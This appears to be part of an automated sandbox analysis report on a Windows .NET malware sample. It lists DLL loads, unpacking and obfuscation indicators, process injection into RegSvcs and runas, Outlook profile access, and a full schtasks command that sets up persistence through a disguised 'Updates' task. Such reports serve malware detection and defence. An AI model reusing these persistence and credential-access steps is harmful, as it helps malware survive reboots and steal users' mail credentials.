                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hAtMBptzWt.exe, 00000010.00000000.2407457604.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000014.00000002.3352923930.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000016.00000002.3356664916.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.cs.Net Code: M4mVPErxjG System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_00C1BD62 push eax; retf 0_2_00C1BF59
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_06F76E20 push esp; ret 0_2_06F76E29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401851 push ds; iretd 7_2_00401871
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401A79 pushfd ; retf 7_2_00401A7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401AE1 pushfd ; retf 7_2_00401AE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004032A0 push eax; ret 7_2_004032A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040BB36 push 8DDE865Dh; iretd 7_2_0040BB3E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042344F push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00423453 push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041A505 push ebx; ret 7_2_0041A506
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040CD17 push es; iretd 7_2_0040CD1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00405E75 pushfd ; retf 7_2_00405E77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401EC6 pushfd ; retf 7_2_00401EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040CFC0 push edi; ret 7_2_0040CFC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004147EF push ebx; ret 7_2_004147F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0146225F pushad ; ret 7_2_014627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014627FA pushad ; ret 7_2_014627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014909AD push ecx; mov dword ptr [esp], ecx7_2_014909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0146283D push eax; iretd 7_2_01462858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0146135E push eax; iretd 7_2_01461369
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_00E1BD62 push eax; retf 8_2_00E1BF59
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_00E1BF5A push eax; retf 8_2_00E1BF59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0173C54F push 8B016C67h; ret 14_2_0173C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0173C54D pushfd ; ret 14_2_0173C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0173C9D7 push edi; ret 14_2_0173C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F09AD push ecx; mov dword ptr [esp], ecx14_2_016F09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C1FEC push eax; iretd 14_2_016C1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01747E99 push ecx; ret 14_2_01747EAC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02F06D5B push ds; ret 16_2_02F06E30
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02F06AD4 push 319F0DABh; iretd 16_2_02F06ADE
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02EE8A03 pushfd ; retf 16_2_02EE8A05
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: section name: .text entropy: 7.983402866122095
                Source: GDhinOc.exe.0.drStatic PE information: section name: .text entropy: 7.983402866122095
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, hjSk8EHGb5l16oTZn0.csHigh entropy of concatenated method names: 'Dispose', 'gAAmC1Qt1m', 'QC6afDNvm2', 'D2XkkaKf66', 'VODmb0tqtU', 'D3ImzObcZt', 'ProcessDialogKey', 'vh8anWWG3D', 'lKqamVLEVJ', 'CKtaaOOxTv'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, gQjALeOJnFWAyHHjpqP.csHigh entropy of concatenated method names: 'tNeD98b30g', 'QwND8FX9o5', 'mTfDP8YoRZ', 'V8YDsyC5BU', 'iAIDd5M2R5', 'u5UDLiSVl6', 'XKSDyg9lLR', 'nFlD4fQNS0', 'pVKD3GUTKi', 'huHDjxjMBC'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, CJLCUrQatl5G4FpkW3.csHigh entropy of concatenated method names: 'ATNQdaGn2m', 'W62Qyov51X', 'U4MxMxIVgi', 'm3vxv1j33s', 'dv0xF4NXms', 'Hs6xAs8OoQ', 'IFJxKOe8Np', 'NYixu3OMJm', 'SW4xRVgjtV', 'buOxeH8fGw'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Pw34uvmK9uYKxRX1gq.csHigh entropy of concatenated method names: 'ToString', 'L106wIjwUZ', 'hyw6f7HMeI', 't0N6MmH6dB', 'Mi16vu9Ia8', 'x346FM2Xjd', 'JN36ATI407', 'NPD6KF5KVc', 'ugh6uIfODo', 'rWp6RL6Mil'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, T7qrnMxr5qJ1FRTlWO.csHigh entropy of concatenated method names: 'rN4xshHwvY', 'CZCxLMEHCa', 'Nmgx41xm2H', 'FCbx3iaNJA', 'OGmxU79MXS', 'n9kx6kPrB2', 'IChxgUOUl6', 'AKpx5VaweU', 'ue2xDYXJPZ', 'suXxcoYrHv'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, UuADkOKG7G15alU12u.csHigh entropy of concatenated method names: 'LEZJ9J56Uq', 'oLVJ8oAOAg', 'hnTJPHkb5D', 'CBAJsCcMqq', 'kZpJdEwcTe', 'OacJLVniBx', 'Iv5JyT5nNG', 'hdSJ4SVBfd', 'plyJ3iHRrd', 'oslJjspTtP'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, psNWee8JpDqgu5WYA5.csHigh entropy of concatenated method names: 'pcKUeLhd3w', 'NPPUqxxtFH', 'wBhUWGgUel', 'PU0U7dJEK5', 'YXHUffkyub', 'Vc5UMRIliH', 'ThBUvKrknq', 'Dj4UFJ0oM6', 'qCKUAUonjr', 'ybWUKkibAw'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, cPMfYVSQIacOSjALae.csHigh entropy of concatenated method names: 'CXWgtIAcG0', 'ea3gbExZjV', 'KLa5nKewMQ', 'pP05mKmuQo', 'xo1gwvYRK9', 'f72gq6OCmv', 'eBsg17vTNb', 'nm7gWKr8B5', 'wdGg70RMAi', 'vxlglhGn1e'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, trVhmEXPJju03M06gS.csHigh entropy of concatenated method names: 'Ovn5pfKV3G', 'xyl5omKrUW', 'awt5xdQe0D', 'WIJ5QfPjDC', 'Als5hcMN45', 'sIj5JfsDlW', 'DFt5NeWI8Z', 'VQv5Gl0yoH', 'A8N5IVtdX6', 'AdH5rRg3bA'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.csHigh entropy of concatenated method names: 'sM5E2xKTUn', 'jCZEpqHgOe', 'eQ0Eo9ZnPY', 'KJsExoSP7B', 'GfbEQGH4JY', 'zhTEhomJdK', 'UNJEJ47qi6', 'tpKENHP6KB', 'gBeEGc4cX1', 'wfrEItlGB0'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, TnyEFwUPfADDx05OZ1.csHigh entropy of concatenated method names: 'cl1oWt1jH4', 'PTho7aOhKR', 'cBAolA6Uc8', 'Ttto0gv9rO', 'aXxoBU1E5V', 'jrhoYLgQPN', 'j2HoZarkDd', 'q60otADN3h', 'wH0oCRg8oZ', 'eOcoba0XGh'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, zXdrPraPCJk74micJF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XmOaCArbDt', 'twaab8QIsv', 'QRHazZgBFZ', 'm5FEnMox1J', 'EELEmeHo2Y', 'IwoEam26VL', 'KFbEEqhrlk', 'uSkM3WY7vuAQHc5t5ZV'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, AMyNSSAKhaQHodQK8Z.csHigh entropy of concatenated method names: 'DKgDmi8992', 'rHZDEPwtXD', 'aXjDV8Gc3V', 'LX5Dpl9HYU', 'Jv7Do0NUGL', 'JBADQ1C13S', 'Gh0DhClqIW', 'cZF5ZNQs6Z', 'LWi5t3aPIU', 'wq95CR8rF2'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, ES98i1tBVvsqWTwSur.csHigh entropy of concatenated method names: 'P54cCvNKjb8Z3OeRthJ', 'QV3YliNviBpE8dmZNIN', 'oCEh5gc9Oc', 'SbuhDY2og2', 'Xtjhco3IuX', 'bFfU6mNsLgXQ1wGQQIP', 'Mk8WkUNrBVkXOngRQ2h', 'uf4u7JNSlJJ7YkM9qY4'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, vN0XchhhPX9IHgXFR0.csHigh entropy of concatenated method names: 'Jg1mJZ0Blm', 'i26mNhFu1i', 'mKlmIYZmRh', 'XqJmrIutUr', 'rn1mUL8Zp4', 'jQRm6JCJte', 'OXuXpc2KmjOMcOp1hk', 'qoTK18QyRV8xYmgSwO', 'NNSmmquCwq', 'xr0mEZfcTe'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, l138vr9xt3q0YSh6Zl.csHigh entropy of concatenated method names: 'bbl5X1pwsf', 'QJl5fmLTnX', 'kX45MO60uu', 'Bd05vTAKFs', 'E8W5WoCUWC', 'JWc5FCAwSv', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, evS9AWG2CNFAym7a5B.csHigh entropy of concatenated method names: 'm7WS4YWvZm', 'oZuS3Jtcox', 'EyfSXdQrqS', 'CAsSfqATkp', 'CmJSvbkqPN', 'RjUSFpEMj0', 'PLtSKOPJ6I', 'FqRSusjVXU', 'jkYSePUCJi', 'qAFSwn3byb'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, XYunMcMDEnm3SAa2GP.csHigh entropy of concatenated method names: 'gpFJpfDDto', 'GrxJxBeiCO', 'GlTJhN9dLR', 'WMqhbfnCqm', 'vSThzcOpSK', 'MZrJnr1IYP', 'YeOJmiZWns', 'GunJaxVc3m', 'j4xJEU1WMv', 'FJ4JVUj0eE'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, echjWQq01X6VgL2i2E.csHigh entropy of concatenated method names: 'qjIh2VW2wi', 'xFLhopYTN5', 'W7ghQIcFE2', 'DAThJE48f5', 'GaGhNwUdjI', 'BH8QBo9ETq', 'nUdQY56ldk', 'G0sQZHUmdg', 'x0eQtwN7CN', 'bDFQCsHjvp'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, FxU4CYOsPLOiGq2XV5P.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r3YcW06yAT', 'GVVc7xaQye', 'zkDclMLk4c', 'hSDc08h6Yh', 'FNacBZLkfg', 'jvXcYJVSZa', 'ooKcZMewLF'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, vnZumw0lDysfkiJ3bL.csHigh entropy of concatenated method names: 'RmhP48cjw', 'm6nsgtjoL', 'O3hLCOVNG', 'Ke4y8wlK2', 'nOP3yRJjs', 'dQIjrNZ5I', 'cbHaOSWjOQEea5IDLa', 'LS8604qNCXFUjNSWbi', 'VTZ5AHAfo', 'w8tcfrLTy'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeFile created: C:\Users\user\AppData\Roaming\GDhinOc.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
